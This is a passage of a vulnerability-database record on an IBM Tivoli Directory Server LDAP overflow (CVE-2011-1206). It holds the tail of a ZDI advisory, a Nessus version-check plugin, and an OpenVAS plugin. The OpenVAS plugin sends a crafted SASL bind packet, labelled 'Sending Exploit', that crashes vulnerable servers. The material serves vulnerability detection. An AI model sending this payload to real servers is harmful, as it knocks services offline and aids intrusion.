More\r\ndetails can be found at:\r\n\r\nhttps://www-304.ibm.com/support/docview.wss?uid=swg21496117\r\n\r\n-- Disclosure Timeline:\r\n2011-02-17 - Vulnerability reported to vendor\r\n2011-04-18 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Francis Provencher for Protek Research Lab's\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "id": "SECURITYVULNS:DOC:26162", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26162", "title": "ZDI-11-136: IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:30:16", "bulletinFamily": "scanner", "description": "According to its version, the installation of IBM Tivoli Directory\nServer on the remote host is prior to 6.0.0.67, 6.1.0.40, 6.2.0.16, or\n6.3.0.3. 
It is, therefore, affected by one or more of the following\nvulnerabilities :\n\n - A malicious LDAP request can cause a buffer overrun in\n the server, allowing an unauthenticated, remote attacker\n to execute arbitrary code within Tivoli Directory\n Server", "modified": "2019-11-02T00:00:00", "id": "TIVOLI_DIRECTORY_SVR_6303.NASL", "href": "https://www.tenable.com/plugins/nessus/53625", "published": "2011-05-02T00:00:00", "title": "IBM Tivoli Directory Server Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53625);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2011-1206\");\n script_bugtraq_id(47121);\n\n script_name(english:\"IBM Tivoli Directory Server Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of Tivoli Directory Server.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of IBM Tivoli Directory Server installed on the remote\nhost contains multiple security vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its version, the installation of IBM Tivoli Directory\nServer on the remote host is prior to 6.0.0.67, 6.1.0.40, 6.2.0.16, or\n6.3.0.3. It is, therefore, affected by one or more of the following\nvulnerabilities :\n\n - A malicious LDAP request can cause a buffer overrun in\n the server, allowing an unauthenticated, remote attacker\n to execute arbitrary code within Tivoli Directory\n Server's server process. This vulnerability has only\n been recreated on 32 bit platforms. (IO14010, IO14013,\n IO14028, IO14046, IO14045)\n\n - A security vulnerability has been identified in Tivoli\n Directory server. 
If the Server is configured to audit\n extended operations with 'Attributes sent on group\n evaluation extended operation' enabled\n (ibm-auditAttributesOnGroupEvalOp=TRUE), the audit\n entries for the group eval extended op will include\n unmasked values for sensitive data. (IO14023, IO14025,\n IO14028, IO14043, IO14044)\"\n );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d3972f7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-136/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21496117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21496086\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Install the appropriate fix based on the vendor's advisory :\n\n - 6.0.0.8-TIV-ITDS-IF0009\n - 6.1.0.5-TIV-ITDS-IF0003\n - 6.2.0.3-TIV-ITDS-IF0002\n - 6.3.0.0-TIV-ITDS-IF0003\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/02\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:tivoli_directory_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network 
Security, Inc.\");\n\n script_dependencies(\"tivoli_directory_svr_installed.nasl\");\n script_require_keys(\"installed_sw/IBM Security Directory Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"IBM Security Directory Server\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\npatch = NULL;\n\n# Determine the proper fix given the version number.\n# 6.0 branch : 6.0.0.67\n# 6.1 branch : 6.1.0.40\n# 6.2 branch : 6.2.0.16\n# 6.3 branch : 6.3.0.3\nif (version =~ '^6\\\\.')\n{\n if (version =~ '^6\\\\.0\\\\.' && ver_compare(ver:version, fix:'6.0.0.67') == -1)\n {\n fixed = \"6.0.0.67\";\n patch = \"6.0.0.8-TIV-ITDS-IF0009\";\n }\n else if (version =~ '^6\\\\.1\\\\.' && ver_compare(ver:version, fix:'6.1.0.40') == -1)\n {\n fixed = \"6.1.0.40\";\n patch = \"6.1.0.5-TIV-ITDS-IF0003\";\n }\n else if (version =~ '^6\\\\.2\\\\.' && ver_compare(ver:version, fix:'6.2.0.16') == -1)\n {\n fixed = \"6.2.0.16\";\n patch = \"6.2.0.3-TIV-ITDS-IF0002\";\n }\n else if (version =~ '^6\\\\.3\\\\.' && ver_compare(ver:version, fix:'6.3.0.3') == -1)\n {\n fixed = \"6.3.0.3\";\n patch = \"6.3.0.0-TIV-ITDS-IF0003\";\n }\n}\n\nif (isnull(fixed))\n audit(AUDIT_INST_PATH_NOT_VULN, 'IBM Tivoli Directory Server', version, path);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n' +\n '\\n Install ' + patch + ' to update installation.' 
+\n '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "description": "The host is running IBM Tivoli Directory Server and is prone\n to remote code execution vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2011-05-02T00:00:00", "id": "OPENVAS:1361412562310902507", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902507", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ibm_tivoli_dir_server_code_exec_vuln.nasl 11987 2018-10-19 11:05:52Z mmartin $\n#\n# IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902507\");\n script_version(\"$Revision: 11987 $\");\n script_cve_id(\"CVE-2011-1206\", \"CVE-2011-1820\");\n script_bugtraq_id(47121);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 13:05:52 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-02 12:20:04 +0200 (Mon, 02 May 2011)\");\n script_name(\"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"ldap_detect.nasl\");\n script_require_ports(\"Services/ldap\", 389, 636);\n script_mandatory_keys(\"ldap/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44184\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025358\");\n script_xref(name:\"URL\", value:\"http://www.1337day.com/exploits/15889\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17188/\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029672\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029663\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029661\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029660\");\n\n script_tag(name:\"impact\", 
value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code within the context of the affected application or retrieve potentially\n sensitive information.\");\n script_tag(name:\"affected\", value:\"IBM Tivoli Directory Server 5.2 before 5.2.0.5-TIV-ITDS-IF0010,\n 6.0 before 6.0.0.67 (6.0.0.8-TIV-ITDS-IF0009),\n 6.1 before 6.1.0.40 (6.1.0.5-TIV-ITDS-IF0003),\n 6.2 before 6.2.0.16 (6.2.0.3-TIV-ITDS-IF0002),\n and 6.3 before 6.3.0.3\");\n script_tag(name:\"insight\", value:\"The flaw is caused by a stack overflow error in the 'ibmslapd.exe' component\n when allocating a buffer via the 'ber_get_int()' function within\n 'libibmldap.dll' while handling LDAP CRAM-MD5 packets, which could be\n exploited by remote unauthenticated attackers to execute arbitrary code with\n SYSTEM privileges.\");\n script_tag(name:\"solution\", value:\"Apply Vendor patches.\");\n script_tag(name:\"summary\", value:\"The host is running IBM Tivoli Directory Server and is prone\n to remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"ldap.inc\");\n\nport = get_ldap_port( default:389 );\n\nif(! 
ldap_alive(port:port)){\n exit(0);\n}\n\n## LDAP SASL Bind Request\ndata = raw_string(0x30, 0x18, 0x02, 0x01, 0x01, 0x60, 0x13, 0x02,\n 0x01, 0x03, 0x04, 0x00, 0xa3, 0x0c, 0x04, 0x08,\n 0x43, 0x52, 0x41, 0x4d, 0x2d, 0x4d, 0x44, 0x35,\n 0x04, 0x00);\n\nattack = raw_string(0x30, 0x82, 0x01, 0x41, 0x02, 0x01, 0x02, 0x60,\n 0x82, 0x01, 0x3a, 0x02, 0x01, 0x03, 0x04, 0x00,\n 0xa3, 0x82, 0x01, 0x31, 0x04, 0x08, 0x43, 0x52,\n 0x41, 0x4d, 0x2d, 0x4d, 0x44, 0x35, 0x04, 0x84,\n 0xff, 0xff, 0xff, 0xff) +\n crap(data:raw_string(0x41), length: 256) +\n raw_string(0x20, 0x36, 0x61, 0x37, 0x61, 0x31, 0x31, 0x34,\n 0x39, 0x36, 0x30, 0x33, 0x61, 0x64, 0x37, 0x64,\n 0x30, 0x33, 0x34, 0x39, 0x35, 0x66, 0x39, 0x65,\n 0x37, 0x31, 0x34, 0x66, 0x34, 0x30, 0x66, 0x31,\n 0x63);\n\nsoc = open_sock_tcp(port);\nif(! soc){\n exit(0);\n}\n\n## Sending Exploit\nsend(socket:soc, data:data);\nres = recv(socket:soc, length:128);\nsend(socket:soc, data:attack);\nres = recv(socket:soc, length:128);\n\nif(! ldap_alive(port:port)){\n security_message(port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}